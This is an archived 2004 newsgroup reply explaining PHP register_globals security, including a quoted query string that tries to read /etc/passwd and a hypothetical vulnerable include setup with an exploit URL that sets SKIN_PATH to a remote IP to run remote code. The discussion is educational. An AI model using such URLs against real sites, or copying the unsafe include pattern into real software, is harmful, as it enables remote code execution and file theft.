Re: Php query string security
From: Chung Leong (chernyshevsky_at_hotmail.com)
Date: 05/09/04
- Next message: Chung Leong: "Re: From $_GET to $_POST"
- Previous message: MuffinMan: "Re: Vars not valid outside function"
- Maybe in reply to: Phil Roberts: "Re: Php query string security"
- Next in thread: Simon Hadler: "Re: Php query string security"
- Reply: Simon Hadler: "Re: Php query string security"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date: Sat, 8 May 2004 20:35:07 -0400
"Simon Hadler" <nospam@nospam.ns> wrote in message
news:857A1UT038115.2998726852@anonymous.poster...
> Hi was asking some questions about this in alt.php but some didn't get
answered.
> Yes I have read an awful lot now about php security and different
advisories
> and Idon't mind being called a competely dimwit but I still don't
understand
> what prevents this from happening if register_globals is ON:
>
> http://www.mywebsite.com/anypage.php?firststep = fopen ("../etc/passwd",
"r");&secondstep=fread($firststep,filesize("../etc/passwd"));
>
> I can't seem to get this or any variations on the above to work inlcuding
someting
> like thirdstep = print $secondstep , but theoretically it should work
shouldn't
> it ?
>
Nope, that will never work. All it does is print out the text
'fopen("../etc/passwd", "r");'.
It's worth remembering that register_globals isn't insecure on its own.
Vulnerabilities related to the feature usually involves poor use of
include/require (lameass single entry point design and such like). Here's an
example:
main.php:
<?php
include("$DOCUMENT_ROOT/config.php");
include("$SKIN_PATH/header.php");
include("$SKIN_PATH/$action.php");
include("$SKIN_PATH/footer.php");
?>
Every page in this hypothetical site is handled through main.php. Depending
on what the GET parameter "action" is set to, different content appear
(within the same page frame). This application supports mutliple "skins". By
changing $SKIN_PATH in config.php, you can change the entire appearance of
the site. So far so good. Now, in product.php ("product" is one possible
value of $action) another file is included:
product.php:
[ ... stuff ... ]
include("$SKIN_PATH/shopping_cart.php");
[ ... more stuff ... ]
This introduces a vulnerability permitting arbituary code execution, because
if I pass SKIN_PATH in the URL, and I access product.php directly, then I
can get the script to include a remote file:
http://www.viagra4cats.com/patriotic_theme/product.php?SKIN_PATH=http://123.14.123.9
Since I am bypassing main.php, config.php never gets included, so $SKIN_PATH
won't get set and the value from the URL is employed in the include
statement. In this case, http://123.14.123.9/shopping_cart.php would be
loaded and executed.
As you can see, the vulnerability occurs in a quite complicated setup. And
people who write unnessesarily complicated code, who overdesign software,
are usually not security conscious. "Complexity is the enemy of security" to
quote Bruce Schneider. When you combine large codebases, feature bloat, and
people who don't care, the end result is--predictably--insecure PHP
applications. While register_globals is the enabling mechanism, it's not the
cause of the insecurity, and the bad rap that it carries is in my opinion
entirely undeserved.
- Next message: Chung Leong: "Re: From $_GET to $_POST"
- Previous message: MuffinMan: "Re: Vars not valid outside function"
- Maybe in reply to: Phil Roberts: "Re: Php query string security"
- Next in thread: Simon Hadler: "Re: Php query string security"
- Reply: Simon Hadler: "Re: Php query string security"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Relevant Pages
|
|
